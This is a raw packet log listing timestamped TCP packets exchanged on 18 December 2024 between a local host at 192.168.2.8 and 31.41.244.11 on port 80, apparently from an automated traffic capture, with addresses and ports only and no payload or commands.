Dec 18, 2024 13:38:49.784102917 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.784236908 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.784337997 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.785214901 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.785296917 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.785375118 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.785990000 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.786365032 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.786500931 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.786560059 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.786643028 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.787476063 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.787760973 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.918344975 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.918473005 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.918514967 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.918628931 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.918875933 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.919111013 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.919114113 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.919162035 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.920033932 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.920128107 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.920464993 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.921155930 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.921288967 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.921315908 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.921374083 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.922226906 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.922410011 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.922422886 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.922533035 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.923445940 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.923553944 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.923578024 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.923638105 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.924695015 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.924776077 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.924956083 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.925005913 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.925776005 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.925913095 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.925942898 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.926008940 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.927323103 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.927335024 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.927387953 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.928399086 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.928462982 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.928634882 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.928864002 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.929737091 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.929815054 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.929902077 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.929975033 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.930902958 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.931051970 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.931055069 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.931087971 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.932158947 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.932259083 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.932367086 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.932420969 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.933204889 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.933264971 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.933343887 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.933480978 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.934216022 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.934290886 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.934317112 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.934487104 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.935174942 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.935242891 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.935269117 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.935331106 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.936289072 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.936358929 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.936461926 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.936534882 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.937520027 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.937710047 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.937778950 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.937848091 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.938608885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.938688993 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.938802958 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.938956022 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.939778090 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.939840078 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.939938068 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.939997911 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.941019058 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.941077948 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.941230059 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.941294909 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.942138910 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.942270994 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.942475080 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.942522049 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.943469048 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.943522930 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.943547964 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.943597078 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.944705963 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.944773912 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.944834948 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.944894075 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.945715904 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.945868969 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.945916891 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.945981026 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.947247028 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.947309971 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.947319031 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.947371006 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.948066950 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.948132038 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.948148966 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.948231936 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.949143887 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.949282885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.949304104 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.949322939 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.950269938 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.950380087 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.950448990 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.950510025 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.951462030 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.951642990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.951723099 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.951801062 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.952625990 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.952764988 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.952804089 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.952856064 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.953797102 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.953864098 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.954000950 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.954138041 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.955076933 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.955378056 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.955643892 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.956162930 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.956471920 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.956573963 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.957361937 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.957499981 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.957530022 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.958019972 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.958564043 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.958679914 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.959019899 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.959333897 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.959686041 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.959769964 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.959820032 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.959889889 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.960833073 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.960932970 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.961023092 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.961131096 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.962125063 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.962188959 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.962425947 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.962817907 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.964207888 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.964220047 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.964327097 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.964667082 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.964720011 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.965042114 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.965157032 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.965552092 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.965688944 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.965723038 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.965827942 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.966833115 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.967011929 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.967040062 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.967104912 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.967843056 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.967945099 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.968065023 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.968116999 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.969047070 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.969273090 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.969293118 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.969340086 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.970295906 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.970423937 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.970474958 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.971477985 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.971611977 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.971730947 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.971832991 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.972811937 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.972882986 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.972912073 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.973040104 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.973747969 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.973799944 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.973871946 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.973942041 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.974912882 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.974977970 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.975047112 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.975128889 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.976128101 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.976283073 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.976290941 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.976480007 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.977396011 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.977473021 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.977523088 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.977523088 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.978399992 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.978620052 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.978655100 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.978975058 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.979527950 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.979599953 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.110352993 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.110683918 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.110737085 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.110737085 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.111032009 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.111144066 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.111476898 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.112080097 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.112210035 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.112212896 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.113157988 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.113332987 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.113339901 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.113389969 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.114351034 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.114414930 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.114464045 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.114542007 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.115453005 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.115520000 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.115717888 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.115850925 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.116631031 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.116708040 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.116827965 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.116926908 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.117839098 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.117995977 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.118033886 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.118171930 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.118993044 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.119308949 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.119414091 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.120279074 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.120418072 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.120584965 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.121335030 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.121496916 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.121524096 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.121931076 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.122595072 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.122679949 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.122745991 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.122836113 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.123673916 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.123776913 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.123862028 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.124070883 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.124877930 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.125008106 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.125026941 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.125097036 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.126231909 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.126384020 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.126553059 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.127872944 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.127887011 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.128056049 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.128503084 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.128768921 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.128937960 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.129477024 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.129861116 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.129936934 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.129951954 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.130192995 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.130798101 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.131048918 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.131098032 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.131098032 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.131911993 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.132009983 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.132148981 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.132519007 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.133148909 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.133172989 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.133244038 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.133244038 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.134270906 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.134417057 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.134533882 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.135371923 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.135569096 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.135662079 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.136660099 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.136795998 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.136826038 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.137599945 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.137965918 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.138065100 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.138268948 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.138365030 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.139422894 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.139592886 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.139622927 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.139700890 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.140245914 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.140480995 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.140501022 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.140546083 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.141319036 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.141422033 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.141494989 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.141855001 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.142401934 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.142487049 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.142599106 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.142647982 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.144172907 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.144251108 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.144413948 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.144753933 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.144964933 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.144969940 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.146120071 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.146126032 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.146140099 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:50.146223068 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:50.146223068 CET	49723	80	192.168.2.8	31.41.244.11
